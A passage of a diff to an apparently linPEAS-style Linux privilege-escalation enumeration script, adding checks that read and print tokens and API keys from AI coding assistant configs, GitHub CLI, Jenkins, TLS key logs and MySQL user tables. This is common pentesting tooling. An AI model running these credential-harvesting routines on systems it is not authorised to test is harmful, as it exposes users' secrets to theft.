"s,sshd,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#|^@" | sed -${E} "s,auth|accessfile=|secret=|user,${SED_RED},g"; done; echo "";find "$f" -name "*" | while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "nullok|nullok_secure|pam_permit\.so|pam_rootok\.so|pam_exec\.so|pam_unix\.so.*(nullok|remember=0)|sufficient\s+pam_unix\.so" | grep -Ev "^#|^@" | sed -${E} "s,nullok|nullok_secure|pam_permit\.so|pam_rootok\.so|pam_exec\.so|pam_unix\.so.*(nullok|remember=0)|sufficient\s+pam_unix\.so,${SED_RED},g"; done; echo "";done; echo ""; fi @@ -6620,6 +8829,21 @@ if [ "$PSTORAGE_CLOUD_CREDENTIALS" ] || [ "$DEBUG" ]; then fi +if [ "$PSTORAGE_AI_CODING_ASSISTANTS" ] || [ "$DEBUG" ]; then + print_2title "Analyzing AI Coding Assistants Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_AI_CODING_ASSISTANTS\" | grep -E \"\.codex$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".codex"; fi; fi; printf "%s" "$PSTORAGE_AI_CODING_ASSISTANTS" | grep -E "\.codex$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.codex$,${SED_RED},"; find "$f" -name "auth.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,auth.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,access_token|refresh_token|id_token|OPENAI_API_KEY|api_key|auth_mode,${SED_RED},g"; done; echo "";find "$f" -name "config.toml" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.toml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,OPENAI_API_KEY|api_key|auth_mode|model|profile,${SED_RED},g"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_AI_CODING_ASSISTANTS\" | grep -E \"\.claude$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".claude"; fi; fi; printf "%s" "$PSTORAGE_AI_CODING_ASSISTANTS" | grep -E "\.claude$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.claude$,${SED_RED},"; find "$f" -name "settings.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,settings.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,apiKeyHelper|ANTHROPIC_API_KEY|ANTHROPIC_AUTH_TOKEN|Authorization|Bearer|token|secret|mcpServers,${SED_RED},g"; done; echo "";find "$f" -name "settings.local.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,settings.local.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,apiKeyHelper|ANTHROPIC_API_KEY|ANTHROPIC_AUTH_TOKEN|Authorization|Bearer|token|secret|mcpServers,${SED_RED},g"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_AI_CODING_ASSISTANTS\" | grep -E \"\.claude\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".claude.json"; fi; fi; printf "%s" "$PSTORAGE_AI_CODING_ASSISTANTS" | grep -E "\.claude\.json$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.claude\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,auth|token|bearer|session|oauth|api[_-]?key,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_AI_CODING_ASSISTANTS\" | grep -E \"\.gemini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".gemini"; fi; fi; printf "%s" "$PSTORAGE_AI_CODING_ASSISTANTS" | grep -E "\.gemini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.gemini$,${SED_RED},"; find "$f" -name "settings.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,settings.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,GEMINI_API_KEY|GOOGLE_API_KEY|access_token|refresh_token|oauth|client_secret|Authorization|Bearer|headers|mcpServers,${SED_RED},g"; done; echo "";find "$f" -name "oauth_creds.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,oauth_creds.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,access_token|refresh_token|id_token|token_type|scope|client_id,${SED_RED},g"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_AI_CODING_ASSISTANTS\" | grep -E \"\.cursor$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".cursor"; fi; fi; printf "%s" "$PSTORAGE_AI_CODING_ASSISTANTS" | grep -E "\.cursor$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.cursor$,${SED_RED},"; find "$f" -name "mcp.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,mcp.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,Authorization|Bearer|token|api[_-]?key|secret|headers|env,${SED_RED},g"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_AI_CODING_ASSISTANTS\" | grep -E \"\.mcp\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".mcp.json"; fi; fi; printf "%s" "$PSTORAGE_AI_CODING_ASSISTANTS" | grep -E "\.mcp\.json$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.mcp\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,Authorization|Bearer|token|api[_-]?key|secret|headers|env,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_AI_CODING_ASSISTANTS\" | grep -E \"gh$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "gh"; fi; fi; printf "%s" "$PSTORAGE_AI_CODING_ASSISTANTS" | grep -E "gh$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,gh$,${SED_RED},"; find "$f" -name "hosts.yml" | while read ff; do ls -ld "$ff" | sed -${E} "s,hosts.yml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,oauth_token|user:|oauth,${SED_RED},g"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_AI_CODING_ASSISTANTS\" | grep -E \"state\.vscdb$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "state.vscdb"; fi; fi; printf "%s" "$PSTORAGE_AI_CODING_ASSISTANTS" | grep -E "state\.vscdb$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,state\.vscdb$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_AI_CODING_ASSISTANTS\" | grep -E \"state\.vscdb\.backup$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "state.vscdb.backup"; fi; fi; printf "%s" "$PSTORAGE_AI_CODING_ASSISTANTS" | grep -E "state\.vscdb\.backup$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,state\.vscdb\.backup$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_AI_CODING_ASSISTANTS\" | grep -E \"storage\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "storage.json"; fi; fi; printf "%s" "$PSTORAGE_AI_CODING_ASSISTANTS" | grep -E "storage\.json$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,storage\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,github\.copilot|copilot|cursor|openai|anthropic|gemini|token|auth,${SED_RED},g"; done; echo ""; +fi + + if [ "$PSTORAGE_ROAD_RECON" ] || [ "$DEBUG" ]; then print_2title "Analyzing Road Recon Files (limit 70)" if ! [ "`echo \"$PSTORAGE_ROAD_RECON\" | grep -E \"\.roadtools_auth$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".roadtools_auth"; fi; fi; printf "%s" "$PSTORAGE_ROAD_RECON" | grep -E "\.roadtools_auth$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.roadtools_auth$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,accessToken.*,${SED_RED},g"; done; echo ""; @@ -6660,8 +8884,8 @@ fi if [ "$PSTORAGE_REDIS" ] || [ "$DEBUG" ]; then print_2title "Analyzing Redis Files (limit 70)" ( redis-server --version || echo_not_found "redis-server") 2>/dev/null - if [ "`redis-cli INFO 2>/dev/null`" ] && ! [ "`redis-cli INFO 2>/dev/null | grep -i NOAUTH`" ]; then echo "Redis isn't password protected" | sed -${E} "s,.*,${SED_RED},"; fi - if ! [ "`echo \"$PSTORAGE_REDIS\" | grep -E \"redis\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "redis.conf"; fi; fi; printf "%s" "$PSTORAGE_REDIS" | grep -E "redis\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,redis\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,masterauth.*|requirepass.*,${SED_RED},g"; done; echo ""; + redis_info="$(if [ "$TIMEOUT" ]; then $TIMEOUT 2 redis-cli INFO 2>/dev/null; else redis-cli INFO 2>/dev/null; fi)"; if [ "$redis_info" ] && ! echo "$redis_info" | grep -i NOAUTH; then echo "Redis isn't password protected" | sed -${E} "s,.*,${SED_RED},"; fi + if ! [ "`echo \"$PSTORAGE_REDIS\" | grep -E \"redis\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "redis.conf"; fi; fi; printf "%s" "$PSTORAGE_REDIS" | grep -E "redis\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,redis\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,masterauth.*|requirepass.*|rename-command.*|protected-mode.*no,${SED_RED},g"; done; echo ""; fi @@ -6847,6 +9071,7 @@ fi if [ "$PSTORAGE_POSTFIX" ] || [ "$DEBUG" ]; then print_2title "Analyzing Postfix Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_POSTFIX\" | grep -E \"aliases$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "aliases"; fi; fi; printf "%s" "$PSTORAGE_POSTFIX" | grep -E "aliases$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,aliases$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "\|" | sed -${E} "s,\|,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_POSTFIX\" | grep -E \"postfix$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "postfix"; fi; fi; printf "%s" "$PSTORAGE_POSTFIX" | grep -E "postfix$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,postfix$,${SED_RED},"; find "$f" -name "master.cf" | while read ff; do ls -ld "$ff" | sed -${E} "s,master.cf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "user=" | sed -${E} "s,user=|argv=,${SED_RED},g"; done; echo "";done; echo ""; fi @@ -6881,6 +9106,23 @@ if [ "$PSTORAGE_ENV" ] || [ "$DEBUG" ]; then fi +if [ "$PSTORAGE_PROXY_CONFIG" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Proxy Config Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_PROXY_CONFIG\" | grep -E \"environment$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "environment"; fi; fi; printf "%s" "$PSTORAGE_PROXY_CONFIG" | grep -E "environment$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,environment$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "(http|https|ftp|all)_proxy|no_proxy" | grep -Ev "^#" | sed -${E} "s,(http|https|ftp|all)_proxy|no_proxy,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_PROXY_CONFIG\" | grep -E \"apt\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "apt.conf"; fi; fi; printf "%s" "$PSTORAGE_PROXY_CONFIG" | grep -E "apt\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,apt\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "Acquire::http::Proxy|Acquire::https::Proxy|proxy" | grep -Ev "^#" | sed -${E} "s,Acquire::http::Proxy|Acquire::https::Proxy|proxy,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_PROXY_CONFIG\" | grep -E \"apt\.conf\.d$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "apt.conf.d"; fi; fi; printf "%s" "$PSTORAGE_PROXY_CONFIG" | grep -E "apt\.conf\.d$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,apt\.conf\.d$,${SED_RED},"; find "$f" -name "*" | while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "Acquire::http::Proxy|Acquire::https::Proxy|proxy" | grep -Ev "^#" | sed -${E} "s,Acquire::http::Proxy|Acquire::https::Proxy|proxy,${SED_RED},g"; done; echo "";done; echo ""; +fi + + +if [ "$PSTORAGE_SNIFFING_ARTIFACTS" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Sniffing Artifacts Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_SNIFFING_ARTIFACTS\" | grep -E \"\.pcap$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.pcap"; fi; fi; printf "%s" "$PSTORAGE_SNIFFING_ARTIFACTS" | grep -E "\.pcap$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.pcap$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_SNIFFING_ARTIFACTS\" | grep -E \"\.pcapng$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.pcapng"; fi; fi; printf "%s" "$PSTORAGE_SNIFFING_ARTIFACTS" | grep -E "\.pcapng$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.pcapng$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_SNIFFING_ARTIFACTS\" | grep -E \"keys\.log$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "keys.log"; fi; fi; printf "%s" "$PSTORAGE_SNIFFING_ARTIFACTS" | grep -E "keys\.log$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,keys\.log$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "CLIENT_RANDOM|SERVER_HANDSHAKE_TRAFFIC_SECRET|CLIENT_HANDSHAKE_TRAFFIC_SECRET|EXPORTER_SECRET|RESUMPTION_MASTER_SECRET" | sed -${E} "s,CLIENT_RANDOM|SERVER_HANDSHAKE_TRAFFIC_SECRET|CLIENT_HANDSHAKE_TRAFFIC_SECRET|EXPORTER_SECRET|RESUMPTION_MASTER_SECRET,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_SNIFFING_ARTIFACTS\" | grep -E \"sslkeylog\.log$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sslkeylog.log"; fi; fi; printf "%s" "$PSTORAGE_SNIFFING_ARTIFACTS" | grep -E "sslkeylog\.log$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,sslkeylog\.log$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "CLIENT_RANDOM|SERVER_HANDSHAKE_TRAFFIC_SECRET|CLIENT_HANDSHAKE_TRAFFIC_SECRET|EXPORTER_SECRET|RESUMPTION_MASTER_SECRET" | sed -${E} "s,CLIENT_RANDOM|SERVER_HANDSHAKE_TRAFFIC_SECRET|CLIENT_HANDSHAKE_TRAFFIC_SECRET|EXPORTER_SECRET|RESUMPTION_MASTER_SECRET,${SED_RED},g"; done; echo ""; +fi + + if [ "$PSTORAGE_MSMTPRC" ] || [ "$DEBUG" ]; then print_2title "Analyzing Msmtprc Files (limit 70)" if ! [ "`echo \"$PSTORAGE_MSMTPRC\" | grep -E \"\.msmtprc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".msmtprc"; fi; fi; printf "%s" "$PSTORAGE_MSMTPRC" | grep -E "\.msmtprc$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.msmtprc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,user.*|password.*,${SED_RED},g"; done; echo ""; @@ -7017,8 +9259,8 @@ if [ "$PSTORAGE_JENKINS" ] || [ "$DEBUG" ]; then print_2title "Analyzing Jenkins Files (limit 70)" if ! [ "`echo \"$PSTORAGE_JENKINS\" | grep -E \"master\.key$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "master.key"; fi; fi; printf "%s" "$PSTORAGE_JENKINS" | grep -E "master\.key$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,master\.key$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_JENKINS\" | grep -E \"hudson\.util\.Secret$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "hudson.util.Secret"; fi; fi; printf "%s" "$PSTORAGE_JENKINS" | grep -E "hudson\.util\.Secret$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,hudson\.util\.Secret$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_JENKINS\" | grep -E \"credentials\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "credentials.xml"; fi; fi; printf "%s" "$PSTORAGE_JENKINS" | grep -E "credentials\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,credentials\.xml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,secret.*|password.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_JENKINS\" | grep -E \"config\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "config.xml"; fi; fi; printf "%s" "$PSTORAGE_JENKINS" | grep -E "config\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,config\.xml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "secret.*|password.*" | sed -${E} "s,secret.*|password.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_JENKINS\" | grep -E \"credentials\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "credentials.xml"; fi; fi; printf "%s" "$PSTORAGE_JENKINS" | grep -E "credentials\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,credentials\.xml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,secret.*|password.*|token.*|SecretKey.*|credentialId.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_JENKINS\" | grep -E \"config\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "config.xml"; fi; fi; printf "%s" "$PSTORAGE_JENKINS" | grep -E "config\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,config\.xml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "secret.*|password.*|token.*|SecretKey.*|credentialId.*" | sed -${E} "s,secret.*|password.*|token.*|SecretKey.*|credentialId.*,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_JENKINS\" | grep -E \"jenkins$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*jenkins"; fi; fi; printf "%s" "$PSTORAGE_JENKINS" | grep -E "jenkins$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,jenkins$,${SED_RED},"; find "$f" -name "build.xml" | while read ff; do ls -ld "$ff" | sed -${E} "s,build.xml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "secret.*|password.*" | sed -${E} "s,secret.*|password.*,${SED_RED},g"; done; echo "";done; echo ""; fi @@ -7060,7 +9302,7 @@ if [ "$PSTORAGE_WINDOWS" ] || [ "$DEBUG" ]; then if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"NetSetup\.log$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "NetSetup.log"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "NetSetup\.log$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,NetSetup\.log$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"Ntds\.dit$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "Ntds.dit"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "Ntds\.dit$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,Ntds\.dit$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"protecteduserkey\.bin$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "protecteduserkey.bin"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "protecteduserkey\.bin$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,protecteduserkey\.bin$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"RDCMan\.settings$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "RDCMan.settings"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "RDCMan\.settings$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,RDCMan\.settings$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"RDCMan\.settings$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "RDCMan.settings"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "RDCMan\.settings$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,RDCMan\.settings$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,credentialsProfiles|password|encryptedPassword,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"SAM$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "SAM"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "SAM$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,SAM$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"SYSTEM$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "SYSTEM"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "SYSTEM$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,SYSTEM$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"SecEvent\.Evt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "SecEvent.Evt"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "SecEvent\.Evt$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,SecEvent\.Evt$,${SED_RED},"; done; echo ""; @@ -7115,6 +9357,9 @@ fi +fi + +if check_mitre_filter "T1552.001"; then if [ "$PSTORAGE_FREEIPA" ] || [ "$DEBUG" ]; then print_2title "Analyzing FreeIPA Files (limit 70)" ipa_exists="$(command -v ipa)"; if [ "$ipa_exists" ]; then print_info "https://book.hacktricks.wiki/en/linux-hardening/freeipa-pentesting.html"; fi @@ -7123,8 +9368,11 @@ if [ "$PSTORAGE_FREEIPA" ] || [ "$DEBUG" ]; then fi +fi + +if check_mitre_filter "T1552.001"; then if [ "$(command -v gitlab-rails || echo -n '')" ] || [ "$(command -v gitlab-backup || echo -n '')" ] || [ "$PSTORAGE_GITLAB" ] || [ "$DEBUG" ]; then - print_2title "Searching GitLab related files" + print_2title "Searching GitLab related files" "T1552.001" #Check gitlab-rails if [ "$(command -v gitlab-rails || echo -n '')" ]; then echo "gitlab-rails was found. Trying to dump users..." @@ -7155,8 +9403,11 @@ if [ "$(command -v gitlab-rails || echo -n '')" ] || [ "$(command -v gitlab-back echo "" fi +fi + +if check_mitre_filter "T1555.001"; then if [ "$PSTORAGE_KCPASSWORD" ] || [ "$DEBUG" ]; then - print_2title "Analyzing kcpassword files" + print_2title "Analyzing kcpassword files" "T1555.001" print_info "https://book.hacktricks.wiki/en/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#kcpassword" printf "%s\n" "$PSTORAGE_KCPASSWORD" | while read f; do echo "$f" | sed -${E} "s,.*,${SED_RED}," @@ -7165,11 +9416,14 @@ if [ "$PSTORAGE_KCPASSWORD" ] || [ "$DEBUG" ]; then echo "" fi +fi + +if check_mitre_filter "T1558.003"; then kadmin_exists="$(command -v kadmin || echo -n '')" klist_exists="$(command -v klist || echo -n '')" kinit_exists="$(command -v kinit || echo -n '')" if [ "$kadmin_exists" ] || [ "$klist_exists" ] || [ "$kinit_exists" ] || [ "$PSTORAGE_KERBEROS" ] || [ "$DEBUG" ]; then - print_2title "Searching kerberos conf files and tickets" + print_2title "Searching kerberos conf files and tickets" "T1558.003" print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/linux-active-directory.html#linux-active-directory" if [ "$kadmin_exists" ]; then echo "kadmin was found on $kadmin_exists" | sed "s,$kadmin_exists,${SED_RED},"; fi if [ "$kinit_exists" ]; then echo "kadmin was found on $kinit_exists" | sed "s,$kinit_exists,${SED_RED},"; fi @@ -7218,16 +9472,22 @@ if [ "$kadmin_exists" ] || [ "$klist_exists" ] || [ "$kinit_exists" ] || [ "$PST echo "" fi +fi + +if check_mitre_filter "T1190"; then if [ "$PSTORAGE_LOG4SHELL" ] || [ "$DEBUG" ]; then - print_2title "Searching Log4Shell vulnerable libraries" + print_2title "Searching Log4Shell vulnerable libraries" "T1190" printf "%s\n" "$PSTORAGE_LOG4SHELL" | while read f; do echo "$f" | grep -E "log4j\-core\-(1\.[^0]|2\.[0-9][^0-9]|2\.1[0-6])" | sed -${E} "s,log4j\-core\-(1\.[^0]|2\.[0-9][^0-9]|2\.1[0-6]),${SED_RED},"; done echo "" fi +fi + +if check_mitre_filter "T1552.001"; then if [ "$PSTORAGE_LOGSTASH" ] || [ "$DEBUG" ]; then - print_2title "Searching logstash files" + print_2title "Searching logstash files" "T1552.001" printf "$PSTORAGE_LOGSTASH" printf "%s\n" "$PSTORAGE_LOGSTASH" | while read d; do if [ -r "$d/startup.options" ]; then @@ -7240,8 +9500,11 @@ if [ "$PSTORAGE_LOGSTASH" ] || [ "$DEBUG" ]; then fi echo "" +fi + +if check_mitre_filter "T1552.001"; then if [ "$PSTORAGE_MYSQL" ] || [ "$DEBUG" ]; then - print_2title "Searching mysql credentials and exec" + print_2title "Searching mysql credentials and exec" "T1552.001" printf "%s\n" "$PSTORAGE_MYSQL" | while read d; do if [ -f "$d" ] && ! [ "$(basename $d)" = "mysql" ]; then # Only interested in "mysql" that are folders (filesaren't the ones with creds) echo "Potential file containing credentials:" @@ -7287,7 +9550,7 @@ fi echo "" #-- SI) Mysql version if [ "$(command -v mysql || echo -n '')" ] || [ "$(command -v mysqladmin || echo -n '')" ] || [ "$DEBUG" ]; then - print_2title "MySQL version" + print_2title "MySQL version" "T1552.001" mysql --version 2>/dev/null || echo_not_found "mysql" mysqluser=$(systemctl status mysql 2>/dev/null | grep -o ".\{0,0\}user.\{0,50\}" | cut -d '=' -f2 | cut -d ' ' -f1) if [ "$mysqluser" ]; then @@ -7317,6 +9580,8 @@ if [ "$(command -v mysql || echo -n '')" ] || [ "$(command -v mysqladmin || echo if [ "$mysqlconnectnopass" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," mysql -u root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," + mysql -u root -e "SELECT User,Host,plugin FROM mysql.user;" 2>/dev/null | sed -${E} "s,auth_socket|unix_socket|plugin,${SED_RED},g" + mysql -u root -e "SHOW VARIABLES LIKE 'secure_file_priv'; SHOW VARIABLES LIKE 'local_infile';" 2>/dev/null | sed -${E} "s,secure_file_priv|local_infile,${SED_RED},g" else echo_no fi echo "" @@ -7350,6 +9615,9 @@ else fi fi +fi + +if check_mitre_filter "T1552.004"; then if [ "$PSTORAGE_PGP_GPG" ] || [ "$DEBUG" ]; then print_2title "Analyzing PGP-GPG Files (limit 70)" ( (command -v gpg && gpg --list-keys) || echo_not_found "gpg") 2>/dev/null @@ -7357,11 +9625,20 @@ if [ "$PSTORAGE_PGP_GPG" ] || [ "$DEBUG" ]; then (command -v netpgp || echo_not_found "netpgp") 2>/dev/null if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.pgp$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.pgp"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.pgp$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.pgp$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.gpg$\"`" 